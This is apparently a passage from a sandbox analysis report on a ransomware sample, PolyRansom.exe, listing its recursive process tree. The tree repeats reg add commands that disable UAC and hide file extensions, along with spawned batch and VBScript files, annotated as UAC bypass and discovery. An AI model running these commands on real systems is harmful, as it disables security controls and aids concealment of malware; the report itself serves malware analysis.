        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        103⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        103⤵
        Modifies registry key
        
        PID:3644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rqoIAoYQ.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        103⤵
        
        PID:1228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        104⤵
        
        PID:7668
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        104⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        101⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        101⤵
        Modifies registry key
        
        PID:7968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        101⤵
        
        PID:7008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        102⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bgYYUMww.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        101⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        102⤵
        
        PID:6800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        99⤵
        
        PID:8168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        99⤵
        Modifies registry key
        
        PID:6808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        99⤵
        
        PID:7840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nYwIcAoE.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        99⤵
        
        PID:6564
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        100⤵
        
        PID:6708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        97⤵
        
        PID:8068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        98⤵
        
        PID:7976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        97⤵
        Modifies registry key
        
        PID:7828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        97⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tQEkMgMY.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        97⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        98⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        95⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        95⤵
        
        PID:7564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        95⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FqcssocA.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        95⤵
        
        PID:2476
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        96⤵
        
        PID:7476
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        96⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        93⤵
        
        PID:2128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        94⤵
        
        PID:6832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        93⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        93⤵
        
        PID:6768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZgQsIMAs.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        93⤵
        
        PID:7044
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        94⤵
        
        PID:7068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        91⤵
        
        PID:7048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        91⤵
        Modifies registry key
        
        PID:7580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        91⤵
        
        PID:8044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        92⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PMwoAkIw.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        91⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        92⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        89⤵
        
        PID:7892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        89⤵
        
        PID:5388
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        90⤵
        
        PID:5872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        89⤵
        
        PID:8132
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PGUMAksQ.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        89⤵
        
        PID:6400
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        90⤵
        
        PID:7440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        87⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        87⤵
        Modifies registry key
        
        PID:5312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        87⤵
        
        PID:7276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LUAYMgYQ.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        87⤵
        
        PID:6204
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        88⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        88⤵
        
        PID:8000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        85⤵
        Modifies registry key
        
        PID:8044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        85⤵
        
        PID:1772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        85⤵
        
        PID:7036
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qUwAcUYE.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        85⤵
        
        PID:6916
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        86⤵
        
        PID:6560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        83⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:7592
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        83⤵
        Modifies registry key
        
        PID:7396
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        83⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:7420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        84⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OmEEEsoM.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        83⤵
        
        PID:8068
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        84⤵
        
        PID:7840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        81⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:6672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        81⤵
        Modifies registry key
        
        PID:8164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        81⤵
        UAC bypass
        
        PID:7188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LGMEEsQg.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        81⤵
        System Location Discovery: System Language Discovery
        
        PID:8032
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        82⤵
        System Location Discovery: System Language Discovery
        
        PID:7868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        79⤵
        Modifies visibility of file extensions in Explorer
        
        PID:6792
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        80⤵
        
        PID:7224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        79⤵
        Modifies registry key
        
        PID:7252
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        79⤵
        UAC bypass
        
        PID:6316
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eyAsEAYQ.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        79⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        80⤵
        System Location Discovery: System Language Discovery
        
        PID:7192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        77⤵
        Modifies visibility of file extensions in Explorer
        
        PID:6828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        77⤵
        Modifies registry key
        
        PID:7728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        77⤵
        UAC bypass
        
        PID:6560
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DoYsEYkw.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        77⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        78⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        75⤵
        Modifies visibility of file extensions in Explorer
        
        PID:7556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        75⤵
        Modifies registry key
        
        PID:6340
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        75⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:2308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nKgAIEgU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        75⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        76⤵
        
        PID:6576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        73⤵
        Modifies visibility of file extensions in Explorer
        
        PID:7364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        73⤵
        
        PID:6612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        73⤵
        UAC bypass
        
        PID:7480
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TOAYwwwU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        73⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        74⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        71⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:7236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        71⤵
        Modifies registry key
        
        PID:6996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        71⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:7564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eokwsgEE.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        71⤵
        
        PID:7792
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        72⤵
        System Location Discovery: System Language Discovery
        
        PID:7112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        69⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:3124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        69⤵
        Modifies registry key
        
        PID:7312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        69⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:7184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZawEEAoU.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        69⤵
        System Location Discovery: System Language Discovery
        
        PID:5760
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        70⤵
        
        PID:8108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        67⤵
        Modifies visibility of file extensions in Explorer
        
        PID:6524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        67⤵
        Modifies registry key
        
        PID:7668
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        68⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        67⤵
        UAC bypass
        
        PID:5732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QAgssUYw.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        67⤵
        
        PID:5344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        68⤵
        
        PID:3472
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        68⤵
        
        PID:7208
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        65⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:3796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        65⤵
        
        PID:7268
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        66⤵
        
        PID:6148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        65⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:5704
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pWEksEsI.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        65⤵
        
        PID:7896
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        66⤵
        
        PID:7772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        63⤵
        Modifies visibility of file extensions in Explorer
        
        PID:7096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        63⤵
        
        PID:7976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        64⤵
        
        PID:2272
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        63⤵
        UAC bypass
        
        PID:6612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WoEgskAE.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        63⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        64⤵
        
        PID:7708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        61⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4268
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        61⤵
        
        PID:7868
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        61⤵
        UAC bypass
        
        PID:3908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FYUAAQYE.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        61⤵
        
        PID:7992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:6344
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        62⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        59⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:7312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        59⤵
        
        PID:7520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        59⤵
        UAC bypass
        Modifies registry key
        
        PID:8000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iogowsMs.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        59⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        60⤵
        
        PID:7476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        57⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        57⤵
        System Location Discovery: System Language Discovery
        
        PID:1704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        57⤵
        UAC bypass
        Modifies registry key
        
        PID:7672
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BcoUYQQo.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        57⤵
        
        PID:8004
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        58⤵
        System Location Discovery: System Language Discovery
        
        PID:5008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        55⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:6708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        55⤵
        System Location Discovery: System Language Discovery
        
        PID:6792
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        55⤵
        UAC bypass
        
        PID:7292
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:6616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uOokMoIc.bat" "C:\Users\Admin\Downloads\PolyRansom.exe""
        55⤵
        System Location Discovery: System Language Discovery
        
        PID:6600
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        56⤵
        
        PID:7796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        53⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:7904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        53⤵
        
        PID:3648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        53⤵
        UAC bypass
        Modifies registry key
